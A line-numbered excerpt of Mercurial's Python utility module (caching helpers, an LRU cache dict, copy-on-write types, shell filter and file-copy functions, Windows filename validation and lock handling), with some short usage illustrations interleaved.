904 904 if func.__code__.co_argcount == 1:
905 905 # we gain a small amount of time because
906 906 # we don't need to pack/unpack the list
907 907 def f(arg):
908 908 if arg not in cache:
909 909 cache[arg] = func(arg)
910 910 return cache[arg]
911 911 else:
912 912 def f(*args):
913 913 if args not in cache:
914 914 cache[args] = func(*args)
915 915 return cache[args]
916 916
917 917 return f
918 918
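A small illustration of cachefunc on a single-argument function; because the wrapper is what the recursive calls resolve to, memoization applies to the whole recursion:

    @cachefunc
    def fib(n):
        return n if n < 2 else fib(n - 1) + fib(n - 2)

    fib(100)    # completes instantly: each distinct n is computed only once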
919 919 class cow(object):
920 920 """helper class to make copy-on-write easier
921 921
922 922 Call preparewrite before doing any writes.
923 923 """
924 924
925 925 def preparewrite(self):
926 926 """call this before writes, return self or a copied new object"""
927 927 if getattr(self, '_copied', 0):
928 928 self._copied -= 1
929 929 return self.__class__(self)
930 930 return self
931 931
932 932 def copy(self):
933 933 """always do a cheap copy"""
934 934 self._copied = getattr(self, '_copied', 0) + 1
935 935 return self
936 936
937 937 class sortdict(collections.OrderedDict):
938 938 '''a simple sorted dictionary
939 939
940 940 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
941 941 >>> d2 = d1.copy()
942 942 >>> d2
943 943 sortdict([('a', 0), ('b', 1)])
944 944 >>> d2.update([(b'a', 2)])
945 945 >>> list(d2.keys()) # should still be in last-set order
946 946 ['b', 'a']
947 947 '''
948 948
949 949 def __setitem__(self, key, value):
950 950 if key in self:
951 951 del self[key]
952 952 super(sortdict, self).__setitem__(key, value)
953 953
954 954 if pycompat.ispypy:
955 955 # __setitem__() isn't called as of PyPy 5.8.0
956 956 def update(self, src):
957 957 if isinstance(src, dict):
958 958 src = src.iteritems()
959 959 for k, v in src:
960 960 self[k] = v
961 961
962 962 class cowdict(cow, dict):
963 963 """copy-on-write dict
964 964
965 965 Be sure to call d = d.preparewrite() before writing to d.
966 966
967 967 >>> a = cowdict()
968 968 >>> a is a.preparewrite()
969 969 True
970 970 >>> b = a.copy()
971 971 >>> b is a
972 972 True
973 973 >>> c = b.copy()
974 974 >>> c is a
975 975 True
976 976 >>> a = a.preparewrite()
977 977 >>> b is a
978 978 False
979 979 >>> a is a.preparewrite()
980 980 True
981 981 >>> c = c.preparewrite()
982 982 >>> b is c
983 983 False
984 984 >>> b is b.preparewrite()
985 985 True
986 986 """
987 987
988 988 class cowsortdict(cow, sortdict):
989 989 """copy-on-write sortdict
990 990
991 991 Be sure to call d = d.preparewrite() before writing to d.
992 992 """
993 993
994 994 class transactional(object):
995 995 """Base class for making a transactional type into a context manager."""
996 996 __metaclass__ = abc.ABCMeta
997 997
998 998 @abc.abstractmethod
999 999 def close(self):
1000 1000 """Successfully closes the transaction."""
1001 1001
1002 1002 @abc.abstractmethod
1003 1003 def release(self):
1004 1004 """Marks the end of the transaction.
1005 1005
1006 1006 If the transaction has not been closed, it will be aborted.
1007 1007 """
1008 1008
1009 1009 def __enter__(self):
1010 1010 return self
1011 1011
1012 1012 def __exit__(self, exc_type, exc_val, exc_tb):
1013 1013 try:
1014 1014 if exc_type is None:
1015 1015 self.close()
1016 1016 finally:
1017 1017 self.release()
1018 1018
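A minimal concrete subclass, purely illustrative, showing how __exit__ maps onto close() and release():

    class demotransaction(transactional):
        def __init__(self):
            self.state = 'open'

        def close(self):
            self.state = 'committed'

        def release(self):
            if self.state != 'committed':
                self.state = 'aborted'

    with demotransaction() as tr:
        pass                         # no exception: close(), then release()
    assert tr.state == 'committed'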
1019 1019 @contextlib.contextmanager
1020 1020 def acceptintervention(tr=None):
1021 1021 """A context manager that closes the transaction on InterventionRequired
1022 1022
1023 1023 If no transaction was provided, this simply runs the body and returns
1024 1024 """
1025 1025 if not tr:
1026 1026 yield
1027 1027 return
1028 1028 try:
1029 1029 yield
1030 1030 tr.close()
1031 1031 except error.InterventionRequired:
1032 1032 tr.close()
1033 1033 raise
1034 1034 finally:
1035 1035 tr.release()
1036 1036
1037 1037 @contextlib.contextmanager
1038 1038 def nullcontextmanager():
1039 1039 yield
1040 1040
1041 1041 class _lrucachenode(object):
1042 1042 """A node in a doubly linked list.
1043 1043
1044 1044 Holds a reference to nodes on either side as well as a key-value
1045 1045 pair for the dictionary entry.
1046 1046 """
1047 1047 __slots__ = (u'next', u'prev', u'key', u'value')
1048 1048
1049 1049 def __init__(self):
1050 1050 self.next = None
1051 1051 self.prev = None
1052 1052
1053 1053 self.key = _notset
1054 1054 self.value = None
1055 1055
1056 1056 def markempty(self):
1057 1057 """Mark the node as emptied."""
1058 1058 self.key = _notset
1059 1059
1060 1060 class lrucachedict(object):
1061 1061 """Dict that caches most recent accesses and sets.
1062 1062
1063 1063 The dict consists of an actual backing dict - indexed by original
1064 1064 key - and a doubly linked circular list defining the order of entries in
1065 1065 the cache.
1066 1066
1067 1067 The head node is the newest entry in the cache. If the cache is full,
1068 1068 we recycle head.prev and make it the new head. Cache accesses result in
1069 1069 the node being moved to before the existing head and being marked as the
1070 1070 new head node.
1071 1071 """
1072 1072 def __init__(self, max):
1073 1073 self._cache = {}
1074 1074
1075 1075 self._head = head = _lrucachenode()
1076 1076 head.prev = head
1077 1077 head.next = head
1078 1078 self._size = 1
1079 1079 self._capacity = max
1080 1080
1081 1081 def __len__(self):
1082 1082 return len(self._cache)
1083 1083
1084 1084 def __contains__(self, k):
1085 1085 return k in self._cache
1086 1086
1087 1087 def __iter__(self):
1088 1088 # We don't have to iterate in cache order, but why not.
1089 1089 n = self._head
1090 1090 for i in range(len(self._cache)):
1091 1091 yield n.key
1092 1092 n = n.next
1093 1093
1094 1094 def __getitem__(self, k):
1095 1095 node = self._cache[k]
1096 1096 self._movetohead(node)
1097 1097 return node.value
1098 1098
1099 1099 def __setitem__(self, k, v):
1100 1100 node = self._cache.get(k)
1101 1101 # Replace existing value and mark as newest.
1102 1102 if node is not None:
1103 1103 node.value = v
1104 1104 self._movetohead(node)
1105 1105 return
1106 1106
1107 1107 if self._size < self._capacity:
1108 1108 node = self._addcapacity()
1109 1109 else:
1110 1110 # Grab the last/oldest item.
1111 1111 node = self._head.prev
1112 1112
1113 1113 # At capacity. Kill the old entry.
1114 1114 if node.key is not _notset:
1115 1115 del self._cache[node.key]
1116 1116
1117 1117 node.key = k
1118 1118 node.value = v
1119 1119 self._cache[k] = node
1120 1120 # And mark it as newest entry. No need to adjust order since it
1121 1121 # is already self._head.prev.
1122 1122 self._head = node
1123 1123
1124 1124 def __delitem__(self, k):
1125 1125 node = self._cache.pop(k)
1126 1126 node.markempty()
1127 1127
1128 1128 # Temporarily mark as newest item before re-adjusting head to make
1129 1129 # this node the oldest item.
1130 1130 self._movetohead(node)
1131 1131 self._head = node.next
1132 1132
1133 1133 # Additional dict methods.
1134 1134
1135 1135 def get(self, k, default=None):
1136 1136 try:
1137 1137 return self._cache[k].value
1138 1138 except KeyError:
1139 1139 return default
1140 1140
1141 1141 def clear(self):
1142 1142 n = self._head
1143 1143 while n.key is not _notset:
1144 1144 n.markempty()
1145 1145 n = n.next
1146 1146
1147 1147 self._cache.clear()
1148 1148
1149 1149 def copy(self):
1150 1150 result = lrucachedict(self._capacity)
1151 1151 n = self._head.prev
1152 1152 # Iterate in oldest-to-newest order, so the copy has the right ordering
1153 1153 for i in range(len(self._cache)):
1154 1154 result[n.key] = n.value
1155 1155 n = n.prev
1156 1156 return result
1157 1157
1158 1158 def _movetohead(self, node):
1159 1159 """Mark a node as the newest, making it the new head.
1160 1160
1161 1161 When a node is accessed, it becomes the freshest entry in the LRU
1162 1162 list, which is denoted by self._head.
1163 1163
1164 1164 Visually, let's make ``N`` the new head node (* denotes head):
1165 1165
1166 1166 previous/oldest <-> head <-> next/next newest
1167 1167
1168 1168 ----<->--- A* ---<->-----
1169 1169 | |
1170 1170 E <-> D <-> N <-> C <-> B
1171 1171
1172 1172 To:
1173 1173
1174 1174 ----<->--- N* ---<->-----
1175 1175 | |
1176 1176 E <-> D <-> C <-> B <-> A
1177 1177
1178 1178 This requires the following moves:
1179 1179
1180 1180 C.next = D (node.prev.next = node.next)
1181 1181 D.prev = C (node.next.prev = node.prev)
1182 1182 E.next = N (head.prev.next = node)
1183 1183 N.prev = E (node.prev = head.prev)
1184 1184 N.next = A (node.next = head)
1185 1185 A.prev = N (head.prev = node)
1186 1186 """
1187 1187 head = self._head
1188 1188 # C.next = D
1189 1189 node.prev.next = node.next
1190 1190 # D.prev = C
1191 1191 node.next.prev = node.prev
1192 1192 # N.prev = E
1193 1193 node.prev = head.prev
1194 1194 # N.next = A
1195 1195 # It is tempting to do just "head" here, however if node is
1196 1196 # adjacent to head, this will do bad things.
1197 1197 node.next = head.prev.next
1198 1198 # E.next = N
1199 1199 node.next.prev = node
1200 1200 # A.prev = N
1201 1201 node.prev.next = node
1202 1202
1203 1203 self._head = node
1204 1204
1205 1205 def _addcapacity(self):
1206 1206 """Add a node to the circular linked list.
1207 1207
1208 1208 The new node is inserted before the head node.
1209 1209 """
1210 1210 head = self._head
1211 1211 node = _lrucachenode()
1212 1212 head.prev.next = node
1213 1213 node.prev = head.prev
1214 1214 node.next = head
1215 1215 head.prev = node
1216 1216 self._size += 1
1217 1217 return node
1218 1218
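A short sketch of the eviction behavior (capacity of two; reading a key refreshes it, so the untouched key is the one recycled):

    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']            # touch 'a': it becomes the newest entry
    d['c'] = 3        # at capacity: the oldest entry ('b') is evicted
    assert 'b' not in d and 'a' in d and 'c' in d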
1219 1219 def lrucachefunc(func):
1220 1220 '''cache most recent results of function calls'''
1221 1221 cache = {}
1222 1222 order = collections.deque()
1223 1223 if func.__code__.co_argcount == 1:
1224 1224 def f(arg):
1225 1225 if arg not in cache:
1226 1226 if len(cache) > 20:
1227 1227 del cache[order.popleft()]
1228 1228 cache[arg] = func(arg)
1229 1229 else:
1230 1230 order.remove(arg)
1231 1231 order.append(arg)
1232 1232 return cache[arg]
1233 1233 else:
1234 1234 def f(*args):
1235 1235 if args not in cache:
1236 1236 if len(cache) > 20:
1237 1237 del cache[order.popleft()]
1238 1238 cache[args] = func(*args)
1239 1239 else:
1240 1240 order.remove(args)
1241 1241 order.append(args)
1242 1242 return cache[args]
1243 1243
1244 1244 return f
1245 1245
1246 1246 class propertycache(object):
1247 1247 def __init__(self, func):
1248 1248 self.func = func
1249 1249 self.name = func.__name__
1250 1250 def __get__(self, obj, type=None):
1251 1251 result = self.func(obj)
1252 1252 self.cachevalue(obj, result)
1253 1253 return result
1254 1254
1255 1255 def cachevalue(self, obj, value):
1256 1256 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1257 1257 obj.__dict__[self.name] = value
1258 1258
1259 1259 def clearcachedproperty(obj, prop):
1260 1260 '''clear a cached property value, if one has been set'''
1261 1261 if prop in obj.__dict__:
1262 1262 del obj.__dict__[prop]
1263 1263
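A sketch of the propertycache idiom: the first access runs the function and plants the result in the instance __dict__, which then shadows the descriptor on later lookups:

    class example(object):
        @propertycache
        def answer(self):
            print('computing once')
            return 42

    e = example()
    e.answer                          # prints, then caches 42 in e.__dict__
    e.answer                          # served from the instance dict
    clearcachedproperty(e, 'answer')  # drop the cache; next access recomputes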
1264 1264 def pipefilter(s, cmd):
1265 1265 '''filter string S through command CMD, returning its output'''
1266 1266 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1267 1267 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1268 1268 pout, perr = p.communicate(s)
1269 1269 return pout
1270 1270
1271 1271 def tempfilter(s, cmd):
1272 1272 '''filter string S through a pair of temporary files with CMD.
1273 1273 CMD is used as a template to create the real command to be run,
1274 1274 with the strings INFILE and OUTFILE replaced by the real names of
1275 1275 the temporary files generated.'''
1276 1276 inname, outname = None, None
1277 1277 try:
1278 1278 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1279 1279 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1280 1280 fp.write(s)
1281 1281 fp.close()
1282 1282 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1283 1283 os.close(outfd)
1284 1284 cmd = cmd.replace('INFILE', inname)
1285 1285 cmd = cmd.replace('OUTFILE', outname)
1286 1286 code = os.system(cmd)
1287 1287 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1288 1288 code = 0
1289 1289 if code:
1290 1290 raise Abort(_("command '%s' failed: %s") %
1291 1291 (cmd, explainexit(code)))
1292 1292 return readfile(outname)
1293 1293 finally:
1294 1294 try:
1295 1295 if inname:
1296 1296 os.unlink(inname)
1297 1297 except OSError:
1298 1298 pass
1299 1299 try:
1300 1300 if outname:
1301 1301 os.unlink(outname)
1302 1302 except OSError:
1303 1303 pass
1304 1304
1305 1305 filtertable = {
1306 1306 'tempfile:': tempfilter,
1307 1307 'pipe:': pipefilter,
1308 1308 }
1309 1309
1310 1310 def filter(s, cmd):
1311 1311 "filter a string through a command that transforms its input to its output"
1312 1312 for name, fn in filtertable.iteritems():
1313 1313 if cmd.startswith(name):
1314 1314 return fn(s, cmd[len(name):].lstrip())
1315 1315 return pipefilter(s, cmd)
1316 1316
1317 1317 def binary(s):
1318 1318 """return true if a string is binary data"""
1319 1319 return bool(s and '\0' in s)
1320 1320
1321 1321 def increasingchunks(source, min=1024, max=65536):
1322 1322 '''return no less than min bytes per chunk while data remains,
1323 1323 doubling min after each chunk until it reaches max'''
1324 1324 def log2(x):
1325 1325 if not x:
1326 1326 return 0
1327 1327 i = 0
1328 1328 while x:
1329 1329 x >>= 1
1330 1330 i += 1
1331 1331 return i - 1
1332 1332
1333 1333 buf = []
1334 1334 blen = 0
1335 1335 for chunk in source:
1336 1336 buf.append(chunk)
1337 1337 blen += len(chunk)
1338 1338 if blen >= min:
1339 1339 if min < max:
1340 1340 min = min << 1
1341 1341 nmin = 1 << log2(blen)
1342 1342 if nmin > min:
1343 1343 min = nmin
1344 1344 if min > max:
1345 1345 min = max
1346 1346 yield ''.join(buf)
1347 1347 blen = 0
1348 1348 buf = []
1349 1349 if buf:
1350 1350 yield ''.join(buf)
1351 1351
1352 1352 Abort = error.Abort
1353 1353
1354 1354 def always(fn):
1355 1355 return True
1356 1356
1357 1357 def never(fn):
1358 1358 return False
1359 1359
1360 1360 def nogc(func):
1361 1361 """disable garbage collector
1362 1362
1363 1363 Python's garbage collector triggers a GC each time a certain number of
1364 1364 container objects (the number being defined by gc.get_threshold()) are
1365 1365 allocated even when marked not to be tracked by the collector. Tracking has
1366 1366 no effect on when GCs are triggered, only on what objects the GC looks
1367 1367 into. As a workaround, disable GC while building complex (huge)
1368 1368 containers.
1369 1369
1370 1370 This garbage collector issue has been fixed in 2.7, but it still affects
1371 1371 CPython's performance.
1372 1372 """
1373 1373 def wrapper(*args, **kwargs):
1374 1374 gcenabled = gc.isenabled()
1375 1375 gc.disable()
1376 1376 try:
1377 1377 return func(*args, **kwargs)
1378 1378 finally:
1379 1379 if gcenabled:
1380 1380 gc.enable()
1381 1381 return wrapper
1382 1382
1383 1383 if pycompat.ispypy:
1384 1384 # PyPy runs slower with gc disabled
1385 1385 nogc = lambda x: x
1386 1386
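A sketch of the intended use of nogc: decorate a builder of large container structures so allocation-count GC passes do not fire mid-build (a no-op on PyPy, per the override above):

    @nogc
    def buildmap(n):
        # many container allocations; with GC disabled this avoids repeated
        # collections triggered purely by allocation counts
        return {i: [i] for i in range(n)}

    buildmap(100000)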
1387 1387 def pathto(root, n1, n2):
1388 1388 '''return the relative path from one place to another.
1389 1389 root should use os.sep to separate directories
1390 1390 n1 should use os.sep to separate directories
1391 1391 n2 should use "/" to separate directories
1392 1392 returns an os.sep-separated path.
1393 1393
1394 1394 If n1 is a relative path, it is assumed to be
1395 1395 relative to root.
1396 1396 n2 should always be relative to root.
1397 1397 '''
1398 1398 if not n1:
1399 1399 return localpath(n2)
1400 1400 if os.path.isabs(n1):
1401 1401 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1402 1402 return os.path.join(root, localpath(n2))
1403 1403 n2 = '/'.join((pconvert(root), n2))
1404 1404 a, b = splitpath(n1), n2.split('/')
1405 1405 a.reverse()
1406 1406 b.reverse()
1407 1407 while a and b and a[-1] == b[-1]:
1408 1408 a.pop()
1409 1409 b.pop()
1410 1410 b.reverse()
1411 1411 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1412 1412
1413 1413 def mainfrozen():
1414 1414 """return True if we are a frozen executable.
1415 1415
1416 1416 The code supports py2exe (most common, Windows only) and tools/freeze
1417 1417 (portable, not much used).
1418 1418 """
1419 1419 return (safehasattr(sys, "frozen") or # new py2exe
1420 1420 safehasattr(sys, "importers") or # old py2exe
1421 1421 imp.is_frozen(u"__main__")) # tools/freeze
1422 1422
1423 1423 # the location of data files matching the source code
1424 1424 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1425 1425 # executable version (py2exe) doesn't support __file__
1426 1426 datapath = os.path.dirname(pycompat.sysexecutable)
1427 1427 else:
1428 1428 datapath = os.path.dirname(pycompat.fsencode(__file__))
1429 1429
1430 1430 i18n.setdatapath(datapath)
1431 1431
1432 1432 _hgexecutable = None
1433 1433
1434 1434 def hgexecutable():
1435 1435 """return location of the 'hg' executable.
1436 1436
1437 1437 Defaults to $HG or 'hg' in the search path.
1438 1438 """
1439 1439 if _hgexecutable is None:
1440 1440 hg = encoding.environ.get('HG')
1441 1441 mainmod = sys.modules[pycompat.sysstr('__main__')]
1442 1442 if hg:
1443 1443 _sethgexecutable(hg)
1444 1444 elif mainfrozen():
1445 1445 if getattr(sys, 'frozen', None) == 'macosx_app':
1446 1446 # Env variable set by py2app
1447 1447 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1448 1448 else:
1449 1449 _sethgexecutable(pycompat.sysexecutable)
1450 1450 elif (os.path.basename(
1451 1451 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1452 1452 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1453 1453 else:
1454 1454 exe = findexe('hg') or os.path.basename(sys.argv[0])
1455 1455 _sethgexecutable(exe)
1456 1456 return _hgexecutable
1457 1457
1458 1458 def _sethgexecutable(path):
1459 1459 """set location of the 'hg' executable"""
1460 1460 global _hgexecutable
1461 1461 _hgexecutable = path
1462 1462
1463 1463 def _isstdout(f):
1464 1464 fileno = getattr(f, 'fileno', None)
1465 1465 try:
1466 1466 return fileno and fileno() == sys.__stdout__.fileno()
1467 1467 except io.UnsupportedOperation:
1468 1468 return False # fileno() raised UnsupportedOperation
1469 1469
1470 1470 def shellenviron(environ=None):
1471 1471 """return environ with optional override, useful for shelling out"""
1472 1472 def py2shell(val):
1473 1473 'convert python object into string that is useful to shell'
1474 1474 if val is None or val is False:
1475 1475 return '0'
1476 1476 if val is True:
1477 1477 return '1'
1478 1478 return pycompat.bytestr(val)
1479 1479 env = dict(encoding.environ)
1480 1480 if environ:
1481 1481 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1482 1482 env['HG'] = hgexecutable()
1483 1483 return env
1484 1484
1485 1485 def system(cmd, environ=None, cwd=None, out=None):
1486 1486 '''enhanced shell command execution.
1487 1487 run with environment maybe modified, maybe in different dir.
1488 1488
1489 1489 if out is specified, it is assumed to be a file-like object that has a
1490 1490 write() method. stdout and stderr will be redirected to out.'''
1491 1491 try:
1492 1492 stdout.flush()
1493 1493 except Exception:
1494 1494 pass
1495 1495 cmd = quotecommand(cmd)
1496 1496 env = shellenviron(environ)
1497 1497 if out is None or _isstdout(out):
1498 1498 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1499 1499 env=env, cwd=cwd)
1500 1500 else:
1501 1501 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1502 1502 env=env, cwd=cwd, stdout=subprocess.PIPE,
1503 1503 stderr=subprocess.STDOUT)
1504 1504 for line in iter(proc.stdout.readline, ''):
1505 1505 out.write(line)
1506 1506 proc.wait()
1507 1507 rc = proc.returncode
1508 1508 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1509 1509 rc = 0
1510 1510 return rc
1511 1511
1512 1512 def checksignature(func):
1513 1513 '''wrap a function with code to check for calling errors'''
1514 1514 def check(*args, **kwargs):
1515 1515 try:
1516 1516 return func(*args, **kwargs)
1517 1517 except TypeError:
1518 1518 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1519 1519 raise error.SignatureError
1520 1520 raise
1521 1521
1522 1522 return check
1523 1523
1524 1524 # a whitelist of known filesystems where hardlinks work reliably
1525 1525 _hardlinkfswhitelist = {
1526 1526 'btrfs',
1527 1527 'ext2',
1528 1528 'ext3',
1529 1529 'ext4',
1530 1530 'hfs',
1531 1531 'jfs',
1532 1532 'NTFS',
1533 1533 'reiserfs',
1534 1534 'tmpfs',
1535 1535 'ufs',
1536 1536 'xfs',
1537 1537 'zfs',
1538 1538 }
1539 1539
1540 1540 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1541 1541 '''copy a file, preserving mode and optionally other stat info like
1542 1542 atime/mtime
1543 1543
1544 1544 checkambig argument is used with filestat, and is useful only if the
1545 1545 destination file is guarded by a lock (e.g. repo.lock or
1546 1546 repo.wlock).
1547 1547
1548 1548 copystat and checkambig should be exclusive.
1549 1549 '''
1550 1550 assert not (copystat and checkambig)
1551 1551 oldstat = None
1552 1552 if os.path.lexists(dest):
1553 1553 if checkambig:
1554 1554 oldstat = checkambig and filestat.frompath(dest)
1555 1555 unlink(dest)
1556 1556 if hardlink:
1557 1557 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1558 1558 # unless we are confident that dest is on a whitelisted filesystem.
1559 1559 try:
1560 1560 fstype = getfstype(os.path.dirname(dest))
1561 1561 except OSError:
1562 1562 fstype = None
1563 1563 if fstype not in _hardlinkfswhitelist:
1564 1564 hardlink = False
1565 1565 if hardlink:
1566 1566 try:
1567 1567 oslink(src, dest)
1568 1568 return
1569 1569 except (IOError, OSError):
1570 1570 pass # fall back to normal copy
1571 1571 if os.path.islink(src):
1572 1572 os.symlink(os.readlink(src), dest)
1573 1573 # copytime is ignored for symlinks, but in general copytime isn't needed
1574 1574 # for them anyway
1575 1575 else:
1576 1576 try:
1577 1577 shutil.copyfile(src, dest)
1578 1578 if copystat:
1579 1579 # copystat also copies mode
1580 1580 shutil.copystat(src, dest)
1581 1581 else:
1582 1582 shutil.copymode(src, dest)
1583 1583 if oldstat and oldstat.stat:
1584 1584 newstat = filestat.frompath(dest)
1585 1585 if newstat.isambig(oldstat):
1586 1586 # stat of copied file is ambiguous to original one
1587 1587 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1588 1588 os.utime(dest, (advanced, advanced))
1589 1589 except shutil.Error as inst:
1590 1590 raise Abort(str(inst))
1591 1591
1592 1592 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1593 1593 """Copy a directory tree using hardlinks if possible."""
1594 1594 num = 0
1595 1595
1596 1596 gettopic = lambda: hardlink and _('linking') or _('copying')
1597 1597
1598 1598 if os.path.isdir(src):
1599 1599 if hardlink is None:
1600 1600 hardlink = (os.stat(src).st_dev ==
1601 1601 os.stat(os.path.dirname(dst)).st_dev)
1602 1602 topic = gettopic()
1603 1603 os.mkdir(dst)
1604 1604 for name, kind in listdir(src):
1605 1605 srcname = os.path.join(src, name)
1606 1606 dstname = os.path.join(dst, name)
1607 1607 def nprog(t, pos):
1608 1608 if pos is not None:
1609 1609 return progress(t, pos + num)
1610 1610 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1611 1611 num += n
1612 1612 else:
1613 1613 if hardlink is None:
1614 1614 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1615 1615 os.stat(os.path.dirname(dst)).st_dev)
1616 1616 topic = gettopic()
1617 1617
1618 1618 if hardlink:
1619 1619 try:
1620 1620 oslink(src, dst)
1621 1621 except (IOError, OSError):
1622 1622 hardlink = False
1623 1623 shutil.copy(src, dst)
1624 1624 else:
1625 1625 shutil.copy(src, dst)
1626 1626 num += 1
1627 1627 progress(topic, num)
1628 1628 progress(topic, None)
1629 1629
1630 1630 return hardlink, num
1631 1631
1632 1632 _winreservednames = {
1633 1633 'con', 'prn', 'aux', 'nul',
1634 1634 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1635 1635 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1636 1636 }
1637 1637 _winreservedchars = ':*?"<>|'
1638 1638 def checkwinfilename(path):
1639 1639 r'''Check that the base-relative path is a valid filename on Windows.
1640 1640 Returns None if the path is ok, or a UI string describing the problem.
1641 1641
1642 1642 >>> checkwinfilename(b"just/a/normal/path")
1643 1643 >>> checkwinfilename(b"foo/bar/con.xml")
1644 1644 "filename contains 'con', which is reserved on Windows"
1645 1645 >>> checkwinfilename(b"foo/con.xml/bar")
1646 1646 "filename contains 'con', which is reserved on Windows"
1647 1647 >>> checkwinfilename(b"foo/bar/xml.con")
1648 1648 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1649 1649 "filename contains 'AUX', which is reserved on Windows"
1650 1650 >>> checkwinfilename(b"foo/bar/bla:.txt")
1651 1651 "filename contains ':', which is reserved on Windows"
1652 1652 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1653 1653 "filename contains '\\x07', which is invalid on Windows"
1654 1654 >>> checkwinfilename(b"foo/bar/bla ")
1655 1655 "filename ends with ' ', which is not allowed on Windows"
1656 1656 >>> checkwinfilename(b"../bar")
1657 1657 >>> checkwinfilename(b"foo\\")
1658 1658 "filename ends with '\\', which is invalid on Windows"
1659 1659 >>> checkwinfilename(b"foo\\/bar")
1660 1660 "directory name ends with '\\', which is invalid on Windows"
1661 1661 '''
1662 1662 if path.endswith('\\'):
1663 1663 return _("filename ends with '\\', which is invalid on Windows")
1664 1664 if '\\/' in path:
1665 1665 return _("directory name ends with '\\', which is invalid on Windows")
1666 1666 for n in path.replace('\\', '/').split('/'):
1667 1667 if not n:
1668 1668 continue
1669 1669 for c in _filenamebytestr(n):
1670 1670 if c in _winreservedchars:
1671 1671 return _("filename contains '%s', which is reserved "
1672 1672 "on Windows") % c
1673 1673 if ord(c) <= 31:
1674 1674 return _("filename contains '%s', which is invalid "
1675 1675 "on Windows") % escapestr(c)
1676 1676 base = n.split('.')[0]
1677 1677 if base and base.lower() in _winreservednames:
1678 1678 return _("filename contains '%s', which is reserved "
1679 1679 "on Windows") % base
1680 1680 t = n[-1:]
1681 1681 if t in '. ' and n not in '..':
1682 1682 return _("filename ends with '%s', which is not allowed "
1683 1683 "on Windows") % t
1684 1684
1685 1685 if pycompat.iswindows:
1686 1686 checkosfilename = checkwinfilename
1687 1687 timer = time.clock
1688 1688 else:
1689 1689 checkosfilename = platform.checkosfilename
1690 1690 timer = time.time
1691 1691
1692 1692 if safehasattr(time, "perf_counter"):
1693 1693 timer = time.perf_counter
1694 1694
1695 1695 def makelock(info, pathname):
1696 1696 try:
1697 1697 return os.symlink(info, pathname)
1698 1698 except OSError as why:
1699 1699 if why.errno == errno.EEXIST:
1700 1700 raise
1701 1701 except AttributeError: # no symlink in os
1702 1702 pass
1703 1703
1704 1704 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1705 1705 os.write(ld, info)
1706 1706 os.close(ld)
1707 1707
1708 1708 def readlock(pathname):
1709 1709 try:
1710 1710 return os.readlink(pathname)
1711 1711 except OSError as why:
1712 1712 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1713 1713 raise
1714 1714 except AttributeError: # no symlink in os
1715 1715 pass
1716 1716 fp = posixfile(pathname)
1717 1717 r = fp.read()
1718 1718 fp.close()
1719 1719 return r
1720 1720
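# A minimal round-trip sketch for makelock()/readlock(); the lock path and
# info below are illustrative. Where os.symlink exists, the info travels in
# the link target; otherwise it goes into the contents of an O_EXCL-created
# file, and readlock() transparently reads back either representation:
#
#     info = b'myhost:12345'
#     makelock(info, b'/tmp/scratch/lock')
#     assert readlock(b'/tmp/scratch/lock') == info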
1721 1721 def fstat(fp):
1722 1722 '''stat file object that may not have fileno method.'''
1723 1723 try:
1724 1724 return os.fstat(fp.fileno())
1725 1725 except AttributeError:
1726 1726 return os.stat(fp.name)
1727 1727
1728 1728 # File system features
1729 1729
1730 1730 def fscasesensitive(path):
1731 1731 """
1732 1732 Return true if the given path is on a case-sensitive filesystem
1733 1733
1734 1734 Requires a path (like /foo/.hg) ending with a foldable final
1735 1735 directory component.
1736 1736 """
1737 1737 s1 = os.lstat(path)
1738 1738 d, b = os.path.split(path)
1739 1739 b2 = b.upper()
1740 1740 if b == b2:
1741 1741 b2 = b.lower()
1742 1742 if b == b2:
1743 1743 return True # no evidence against case sensitivity
1744 1744 p2 = os.path.join(d, b2)
1745 1745 try:
1746 1746 s2 = os.lstat(p2)
1747 1747 if s2 == s1:
1748 1748 return False
1749 1749 return True
1750 1750 except OSError:
1751 1751 return True
1752 1752
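# A fscasesensitive() sketch; b'/repo/.hg' is an illustrative path whose
# final component exists and contains letters that can be case-folded:
#
#     if not fscasesensitive(b'/repo/.hg'):
#         # e.g. default HFS+ or NTFS: fold filename case before comparing
#         ...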
1753 1753 try:
1754 1754 import re2
1755 1755 _re2 = None
1756 1756 except ImportError:
1757 1757 _re2 = False
1758 1758
1759 1759 class _re(object):
1760 1760 def _checkre2(self):
1761 1761 global _re2
1762 1762 try:
1763 1763 # check if match works, see issue3964
1764 1764 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1765 1765 except ImportError:
1766 1766 _re2 = False
1767 1767
1768 1768 def compile(self, pat, flags=0):
1769 1769 '''Compile a regular expression, using re2 if possible
1770 1770
